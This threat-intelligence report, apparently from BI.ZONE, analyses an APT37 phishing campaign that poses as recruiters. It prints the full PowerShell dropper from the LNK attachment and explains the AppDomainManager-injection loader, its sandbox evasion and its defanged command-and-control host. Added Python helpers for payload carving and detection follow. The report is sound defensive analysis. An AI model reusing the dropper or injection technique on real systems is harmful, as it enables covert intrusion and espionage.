Squid Werewolf cyber spies masquerade as recruiters

BI.ZONE


The adversaries impersonated a legitimate company, emailing fake job descriptions to employees of targeted organizations

Espionage activity clusters may pose as recruiters to distribute phishing emails, targeting key employees in organizations of interest. In December 2024, the BI.ZONE Threat Intelligence team uncovered a peculiar phishing campaign aimed at luring victims with fake job opportunities at an industrial organization. A detailed analysis revealed that the attack had been carried out by Squid Werewolf (APT37, Ricochet Chollima, ScarCruft, Reaper Group).

Adversaries often send phishing emails impersonating major or well‑known organizations or reference them for credibility. The stronger a brand, the more likely threat actors are to exploit its identity. Recognizable logos and other branding elements make phishing emails appear more authentic, prompting victims to open them. It should be noted that trademark owners are not responsible for the actions of threat actors or any resulting damages.

Key findings

  • Targeted phishing emails with relevant subject lines enable attackers to promptly access data within the systems used by key personnel.
  • Threat actors are increasingly shifting away from Microsoft Word documents and Microsoft Excel spreadsheets, instead focusing on archives containing executables, scripts, or shortcuts.
  • Espionage clusters are opting for more sophisticated methods and tools. Therefore, using advanced threat detection solutions such as EDR is recommended to mitigate the risks.

Campaign

The attack would begin with a phishing email, which the adversaries disguised as a job offer from a United Industrial Complex HR representative.

Phishing email sent by the threat actor

The attachment comprised a password-protected file Предложение о работе.zip, with the password provided in the email. The ZIP archive included an LNK file Предложение о работе.pdf.lnk which, once opened, executed the following command:

powershell.exe -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';if(Get-ChildItem $env:temp -recurse 'Предложение о работе.pdf.lnk'){$k=New-Object IO.FileStream ($env:temp+'\'+((Get-ChildItem $env:temp -recurse 'Предложение о работе.pdf.lnk').Directory).Name+'\'+'Предложение о работе.pdf.lnk'),'Open','Read','ReadWrite'}else{$k=New-Object IO.FileStream 'Предложение о работе.pdf.lnk','Open','Read','ReadWrite'};$b=New-Object byte[](692604);$k.Seek(3001,[IO.SeekOrigin]::Begin);$k.Read($b,0,692604);$a=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64CharArray($b,0,$b.Length)) -split ':';copy 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe' ($t+'\d.exe');[IO.File]::<# mm #>WriteAllBytes($t+'\d.exe.config',[Convert]::FromBase64""String($a[0]));[IO.File]::<# mm #>WriteAllBytes($t+'\DomainManager.dll',[Convert]::FromBase64""String($a[1]));[IO.File]::<# mm #>WriteAllBytes($env:temp+'\mngs Attachement.pdf',[Convert]::FromBase64""String($a[2]));explorer ($env:temp+'\mngs Attachement.pdf');start ($t+'\d.exe')

This command triggered the following sequence:

  • Open the file Предложение о работе.pdf.lnk, read the Base64-encoded data starting at offset 3001, and decode it. The resulting data is split by the : character, and each part is decoded again using Base64.
  • Copy the file %WINDOWS%\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\d.exe to gain persistence in the system.
  • Save the decoded data to the following files:
    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\d.exe.config
    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\DomainManager.dll
    %TEMP%\mngs Attachement.pdf
  • Open the phishing document mngs Attachement.pdf.
  • Run the d.exe executable.

Base64-encoded payload in Предложение о работе.pdf.lnk

Phishing document mngs Attachement.pdf
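
The carving steps above, written out in Python as an offline triage helper (an added example, not BI.ZONE's tooling). It follows the layout the LNK command reveals: Base64 text at offset 3001, 692604 bytes long, decoding to a UTF-16LE string of three ':'-separated Base64 blobs. The stand-in LNK, the function names and the magic-byte triage are constructed here for illustration.

```python
import base64
from typing import Dict

# Layout as carved by the LNK's PowerShell command: Base64 text starts at byte
# offset 3001 and runs for 692604 bytes; decoding it gives a UTF-16LE string of
# three ':'-separated Base64 blobs (d.exe.config, DomainManager.dll, decoy PDF).
PAYLOAD_OFFSET = 3001
PAYLOAD_LENGTH = 692604
ARTIFACT_NAMES = ("d.exe.config", "DomainManager.dll", "mngs Attachement.pdf")


def extract_embedded_artifacts(lnk: bytes, offset: int = PAYLOAD_OFFSET,
                               length: int = PAYLOAD_LENGTH) -> Dict[str, bytes]:
    """Carve the three embedded files out of an LNK built like the sample."""
    blob = lnk[offset:offset + length]
    outer = base64.b64decode(blob, validate=True)   # Convert.FromBase64CharArray
    text = outer.decode("utf-16-le")                 # Text.Encoding.Unicode.GetString
    parts = text.split(":")                          # -split ':' (':' is not a Base64 character)
    if len(parts) < len(ARTIFACT_NAMES):
        raise ValueError(f"expected 3 ':'-separated blobs, found {len(parts)}")
    return {name: base64.b64decode(parts[i]) for i, name in enumerate(ARTIFACT_NAMES)}


def classify(data: bytes) -> str:
    """Quick triage of a carved artifact by its magic bytes."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.lstrip().startswith((b"<?xml", b"<configuration")):
        return "xml-config"
    return "unknown"


def build_sample_lnk(config: bytes, dll: bytes, pdf: bytes, offset: int = PAYLOAD_OFFSET) -> bytes:
    """Constructed stand-in for the sample: 0x4C LNK magic, padding up to the offset, then the payload."""
    inner = ":".join(base64.b64encode(x).decode("ascii") for x in (config, dll, pdf))
    outer = base64.b64encode(inner.encode("utf-16-le"))
    return b"L\x00\x00\x00" + b"\x00" * (offset - 4) + outer


if __name__ == "__main__":
    sample = build_sample_lnk(b"<configuration/>", b"MZ\x90\x00fake-dll", b"%PDF-1.4 decoy")
    for name, data in extract_embedded_artifacts(sample).items():
        print(f"{name}: {len(data)} bytes, looks like {classify(data)}")
```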

The d.exe executable is a renamed copy of dfsvc.exe, the ClickOnce deployment service: a native Windows process associated with ClickOnce, a technology used to deploy and update .NET applications. When started, it loads the dynamic-link library (DLL) DomainManager.dll.

The d.exe file is a .NET application. When a user runs a .NET application, the Common Language Runtime (CLR) automatically loads and analyzes its configuration file (in this case, d.exe.config).

The d.exe.config file contents:

The <runtime> section of the configuration file specifies the .NET CLR runtime settings used to load a custom AppDomainManager instead of the default one:

  • <appDomainManagerType value="DomainManager.InjectedDomainManager" /> indicates the class to be used as the AppDomainManager: the CLR will load the class InjectedDomainManager from the namespace DomainManager.
  • <appDomainManagerAssembly value="DomainManager" /> indicates the assembly (DLL) from which AppDomainManager is loaded. In our case, this is a DLL file located in the same directory as the d.exe executable.

System.AppDomainManager is a built-in .NET mechanism that makes it possible to intercept application startup: it allows custom code to run as soon as a program starts, including module injection. You can learn more about this module loading technique here.
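
A defender-side check for the configuration described above, added here as an example (not BI.ZONE's code): it parses an <exe>.config, reports whether the <runtime> section redirects the AppDomainManager, flags a config that sits in a Startup folder, and names the DLL the CLR would resolve next to it. The SAMPLE_CONFIG is constructed from the two elements quoted in the analysis; the <configuration> wrapper is assumed to be the standard .NET layout.

```python
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# Constructed stand-in for d.exe.config: the two <runtime> elements are the ones
# quoted in the analysis; the <configuration> wrapper is the standard .NET
# layout and is assumed here.
SAMPLE_CONFIG = """<configuration>
  <runtime>
    <appDomainManagerType value="DomainManager.InjectedDomainManager" />
    <appDomainManagerAssembly value="DomainManager" />
  </runtime>
</configuration>"""

STARTUP_MARKER = "/start menu/programs/startup/"


def find_appdomainmanager_override(config_xml: str) -> Optional[Dict[str, str]]:
    """Return the AppDomainManager type/assembly a config asks the CLR to load, if any."""
    runtime = ET.fromstring(config_xml).find("runtime")
    if runtime is None:
        return None
    type_el = runtime.find("appDomainManagerType")
    asm_el = runtime.find("appDomainManagerAssembly")
    if type_el is None and asm_el is None:
        return None
    return {"type": type_el.get("value", "") if type_el is not None else "",
            "assembly": asm_el.get("value", "") if asm_el is not None else ""}


def assess_config(config_path: str, config_xml: str) -> List[str]:
    """Reasons an <exe>.config looks like AppDomainManager injection, plus what to collect."""
    reasons: List[str] = []
    override = find_appdomainmanager_override(config_xml)
    if override is None:
        return reasons
    reasons.append(f"runtime overrides AppDomainManager with {override['type']!r} "
                   f"from assembly {override['assembly']!r}")
    path = PureWindowsPath(config_path)
    if STARTUP_MARKER in path.as_posix().lower():
        reasons.append("config sits in a Startup folder, so the host exe is also a persistence entry")
    if override["assembly"]:
        # The CLR resolves the manager assembly from the application directory,
        # so the DLL next to the config is the loader to collect and analyze.
        dll = path.parent / (override["assembly"] + ".dll")
        reasons.append(f"collect {dll} for analysis")
    return reasons
```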

DomainManager.dll is a C#-based loader that is obfuscated, likely using Obfuscar.

The loader's strings are stored in a byte array that is XOR-encrypted twice: each byte is XORed with its index in the array and with the key 0xAA.

The entry point is in the method InitializeNewDomain of the class InjectedDomainManager.

A code example is available below (methods starting with f_ were renamed by a BI.ZONE Threat Intelligence analyst):

The loader can perform the following operations:

  1. Check Internet connectivity by calling https://www.timeapi[.]io/api/time/current/zone?timeZone=Europe%2FAmsterdam. If the server response includes the string “seconds”, access is confirmed; otherwise, the Internet is considered unavailable.
  2. Check the program's runtime to impede sandbox execution: the loader captures the current timestamp, sleeps for 10 minutes, then takes a new timestamp and calculates the difference. If it exceeds nine minutes, the loader sends a GET request to hxxps://hwsrv-1253398.hostwindsdns[.]com/307c77ab-f41f-4dd4-a478-2a71b9625f64/c/discountcode.php and then terminates.
  3. If all checks are successfully passed, the loader disables autoruns from the startup folder by setting the following registry key parameters:
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder]:
    -dll = 0x3
    -exe.config = 0x3
  4. Check for the presence of %LOCALAPPDATA%\DomainManager.conf. If the file exists, the loader reads the malicious payload stored there (encrypted using AES128 CBC), decrypts it, and executes it in memory. If the file does not exist, the loader sends a GET request to hxxps://hwsrv-1253398.hostwindsdns[.]com/307c77ab-f41f-4dd4-a478-2a71b9625f64/c/shoppingcart.php. The server response is decrypted using AES128 CBC; it contains a malicious payload, which the loader runs in memory and then saves to %LOCALAPPDATA%\DomainManager.conf, again encrypted with AES128 CBC. The payload was unavailable at the time of the research.

The attack detected by BI.ZONE Threat Intelligence closely resembles one described by the Securonix team, who attribute it to the APT37 cluster (dubbed Squid Werewolf by BI.ZONE).

The adversaries employed a similar C#-based library in the past. At the time, however, the payload was decrypted using a Caesar (shift) cipher and contained obfuscated JavaScript code. The payload comprised another loader that sent a victim’s computer name to the server, then loaded and executed a PowerShell script, incorporating the VeilShell remote access trojan.

Indicators of compromise

  • 20dd93441c5e78b7adc7764c92719bed70ddb0676f707df7ea9f37d7969f4776
  • 49a2ed08930ed20cbf859ca2fe3113e64f7a305c7a03cbda284fcceb781d053b
  • 0601426a6da40ec9b47bab54e4ec149ba69ee58f787eea0e32d1001cab1abd04
  • hwsrv-1253398.hostwindsdns[.]com

MITRE ATT&CK

Detection

The described malicious activity can be detected using the following rules from BI.ZONE EDR:

  • win_suspicious_powershell_base64
  • win_renamed_dfsvc_process
  • win_th_create_file_in_startup_folder_via_command_interpreter
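
To show what these three rules look for, here is an added example (not BI.ZONE EDR's rule logic) that runs equivalent checks over a few constructed, Sysmon-like event records mirroring the chain above; field names and the events themselves are assumed. The genuine dfsvc.exe launched from the Framework directory is included to show that it does not alert.

```python
import re
from typing import Dict, List, Tuple

# Constructed telemetry in a Sysmon-like shape (field names are assumed); the
# values mirror the chain described in the report, they are not captured events.
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original": "PowerShell.EXE",
     "cmdline": r"""powershell.exe -nop -c $a=[Convert]::FromBase64""String($b);[IO.File]::<# mm #>WriteAllBytes($t+'\d.exe.config',$a)"""},
    {"type": "file", "creator": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DomainManager.dll"},
    {"type": "process", "image": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d.exe",
     "original": "dfsvc.exe", "cmdline": "d.exe"},
    {"type": "process", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe",
     "original": "dfsvc.exe", "cmdline": "dfsvc.exe"},   # legitimate ClickOnce service, must not alert
]

INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)


def base_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def normalize_cmdline(cmd: str) -> str:
    # Strip the two obfuscation tricks seen in the sample so keyword matching sees
    # the real method names: inline <# #> comments and '""' splitting a token.
    return re.sub(r"<#.*?#>", "", cmd).replace('""', "")


def win_suspicious_powershell_base64(e: Dict[str, str]) -> bool:
    if e["type"] != "process" or base_name(e["image"]) not in ("powershell.exe", "pwsh.exe"):
        return False
    c = normalize_cmdline(e["cmdline"]).lower()
    return "frombase64" in c and any(f in c for f in (" -nop", " -noprofile", " -enc", " -e "))


def win_renamed_dfsvc_process(e: Dict[str, str]) -> bool:
    # PE OriginalFileName says dfsvc.exe but the on-disk name differs (d.exe here).
    return e["type"] == "process" and e.get("original", "").lower() == "dfsvc.exe" \
        and base_name(e["image"]) != "dfsvc.exe"


def win_th_create_file_in_startup_folder_via_command_interpreter(e: Dict[str, str]) -> bool:
    return e["type"] == "file" and base_name(e["creator"]) in INTERPRETERS \
        and STARTUP_DIR.search(e["target"]) is not None


RULES = (win_suspicious_powershell_base64, win_renamed_dfsvc_process,
         win_th_create_file_in_startup_folder_via_command_interpreter)


def run_rules(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, r.__name__) for i, e in enumerate(events) for r in RULES if r(e)]
```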

How to protect your company from such threats

Like many other clusters, Squid Werewolf employs phishing emails to infiltrate a victim’s infrastructure. These risks can be mitigated with email protection solutions like BI.ZONE CESP. The service features a high-performance engine of our own design and incorporates various methods of email traffic analysis.

Building an effective cybersecurity strategy requires understanding adversaries’ methods and tools while staying alert to the latest threats. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. The solution provides information about the current attacks, threat actors, their methods and tools, as well as data from underground resources. This intelligence helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.
